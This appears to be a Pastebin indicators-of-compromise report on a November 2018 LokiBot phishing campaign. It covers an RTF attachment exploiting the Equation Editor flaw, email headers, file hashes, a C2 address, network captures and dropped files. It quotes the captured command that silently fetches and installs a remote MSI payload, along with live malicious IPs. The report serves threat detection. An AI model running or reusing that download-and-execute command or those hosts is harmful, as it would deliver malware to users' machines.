API tools faq
paste
Advertisement
VRad

#lokibot_151118

VRad
Nov 15th, 2018
849
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.80 KB | None | 0 0
raw download clone embed print report
  1. #IOC #OptiData #VR #LokiBot #11882 #MSI
  2.  
  3. https://pastebin.com/cqZg7kwr
  4.  
  5. previous_contacts:
  6. --------------
  7. 16/10/18 - https://pastebin.com/LPqjHUkQ
  8. 08/10/18 - https://pastebin.com/cZxQGbyq
  9. 01/10/18 - https://pastebin.com/AVWK3XsB
  10.  
  11. FAQ:
  12. https://radetskiy.wordpress.com/2018/10/19/ioc_lokibot_161018/
  13.  
  14. attack_vector
  15. --------------
  16. email attach doc(RTF) > 11882 > EQNEDT32.EXE GET > msiexec.exe /i 34.244.180.39/oo.msi
  17.  
  18. email_headers
  19. --------------
  20. Received: from elayouty.com (unknown [84.16.232.203]) by mail1.victim.com with smtp
  21. Received: from [::1] (port=48392 helo=server.sauditunnels.com)
  22. by server.sauditunnels.com with esmtpa (Exim 4.91)
  23. (envelope-from <[email protected]>)
  24. Date: Thu, 15 Nov 2018 06:34:16 +0300
  25. From: PURCHASE <[email protected]>
  26. To: undisclosed-recipients:;
  27. Subject: PURCHASE ORDER 25437
  28. X-Sender: [email protected]
  29. User-Agent: Roundcube Webmail/1.3.6
  30.  
  31. files
  32. --------------
  33. SHA-256 1a711629a0cc2ec3e9c14d9500ff7cab1114474c98eb0d9392e269f50aea8513
  34. File name DOC_ORDER25437.doc (!) RTF
  35. File size 265.34 KB
  36.  
  37. SHA-256 917ef82d209a7293244706bbd625c3d055d152d6eb37c30e99b214d1a085e051
  38. File name oo.msi
  39. File size 1.25 MB
  40.  
  41.  
  42. Denis O'Brien @Malwageddon:
  43. "If metadata doesn't lie, the RTF file was created back in Sep."
  44.  
  45. activity
  46. **************
  47.  
  48. cmd.exe & /C CD C: & msiexec.exe /i http://34.244.180{.} 39/oo.msi /quiet
  49.  
  50. PL_GET: 34.244.180.39/oo.msi
  51.  
  52. C2: 188.225.27.43
  53. h11p://sahakyanshn{.} com/baba1010/five/fre.php
  54.  
  55. netwrk
  56. --------------
  57. GET /oo.msi HTTP/1.1
  58. Connection: Keep-Alive
  59. Accept: */*
  60. User-Agent: Windows Installer
  61. Host: 34.244.180.39
  62.  
  63. 188.225.27.43 sahakyanshn{.} com POST /baba1010/five/fre.php HTTP/1.0 Mozilla/4.08 (Charon; Inferno)
  64.  
  65. comp
  66. --------------
  67. msiexec.exe 440 TCP 34.244.180.39 80 SYN_SENT
  68. MSIF29F.tmp 3348 TCP 188.225.27.43 80 ESTABLISHED
  69. [System] 0 TCP 188.225.27.43 80 TIME_WAIT
  70.  
  71. proc
  72. --------------
  73. "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
  74. C:\Windows\SysWOW64\cmd.exe & /C CD C: & msiexec.exe /i http://34.244.180.39/oo.msi /quiet
  75. C:\Windows\SysWOW64\msiexec.exe /i http://34.244.180.39/oo.msi /quiet
  76. C:\Windows\system32\msiexec.exe /V
  77. "C:\Windows\Installer\MSIF29F.tmp"
  78.  
  79. persist
  80. --------------
  81. n/a
  82.  
  83. drop
  84. --------------
  85. C:\Windows\Installer\MSIF29F.tmp
  86. C:\Users\operator\AppData\Roaming\39B01F\FA74A3.exe
  87. C:\Users\operator\AppData\Roaming\39B01F\FA74A3.hdb
  88.  
  89. # # #
  90. doc (RTF) https://www.virustotal.com/#/file/1a711629a0cc2ec3e9c14d9500ff7cab1114474c98eb0d9392e269f50aea8513/details
  91. https://iris-h.services/#/pages/report/3dd0fe53b7f1ade6765df8da45b8b7c2ae6ed41b
  92. msi https://www.virustotal.com/#/file/917ef82d209a7293244706bbd625c3d055d152d6eb37c30e99b214d1a085e051/details
  93. https://analyze.intezer.com/#/analyses/3d6796ac-e098-4b61-aad7-3cc552dd2304
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!